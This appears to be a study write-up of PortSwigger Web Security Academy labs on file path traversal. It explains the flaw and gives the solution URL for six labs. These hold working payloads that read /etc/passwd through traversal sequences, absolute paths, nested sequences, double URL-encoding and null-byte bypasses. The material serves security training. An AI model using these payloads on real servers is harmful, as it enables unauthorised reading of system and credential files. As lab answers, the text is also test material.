File Path Traversal
https://portswigger.net/web-security/file-path-traversal
Consider a shopping application that displays images of items for sale. Images are loaded via some HTML like the following:
The loadImage URL takes a filename parameter and returns the contents of the specified file. The image files themselves are stored on disk in the location /var/www/images/. To return an image, the application appends the requested filename to this base directory and uses a filesystem API to read the contents of the file. In the above case, the application reads from the following file path:
/var/www/images/218.png
The application implements no defenses against directory traversal attacks, so an attacker can request the following URL to retrieve an arbitrary file from the server's filesystem:
https://insecure-website.com/loadImage?filename=../../../etc/passwd
This causes the application to read from the following file path:
/var/www/images/../../../etc/passwd
The sequence ../ is valid within a file path, and means to step up one level in the directory structure. The three consecutive ../ sequences step up from /var/www/images/ to the filesystem root, and so the file that is actually read is:
/etc/passwd
Lab: File path traversal, simple case
view-source:https://aca01f001f9d8480c09625c5001000ea.web-security-academy.net/image?filename=../../../etc/passwd
_____________________________________________
Lab: File path traversal, traversal sequences blocked with absolute path bypass
If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques.
You might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.
view-source:https://aca51f931f78f398c0c25029001c003c.web-security-academy.net/image?filename=/etc/passwd
_____________________________________________
Lab: File path traversal, traversal sequences stripped non-recursively
You might be able to use nested traversal sequences, such as ....// or ..../, which will revert to simple traversal sequences when the inner sequence is stripped.
view-source:https://ac841f421fdb6bc2c0d0f6c400e200c9.web-security-academy.net/image?filename=....//....//....//etc//passwd
_____________________________________________
Lab: File path traversal, traversal sequences stripped with superfluous URL-decode
You might be able to use various non-standard encodings, such as ..%c0%af or ..%252f, to bypass the input filter.
..%c0%af - “/” character is encoded in unicode
..%252f - “/” character is double encoded
view-source:https://ac141fe81e57ef54c093741800870035.web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd
_____________________________________________
Lab: File path traversal, validation of start of path
If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences. For example:
filename=/var/www/images/../../../etc/passwd
view-source:https://ac981f601ef40b27c0ee254500f300da.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd
_____________________________________________
Lab: File path traversal, validation of file extension with null byte bypass
If an application requires that the user-supplied filename must end with an expected file extension, such as .png, then it might be possible to use a null byte to effectively terminate the file path before the required extension. For example:
filename=../../../etc/passwd%00.png
view-source:https://ac9a1fbf1e8a61a7c04945ad00ad001a.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg
Last updated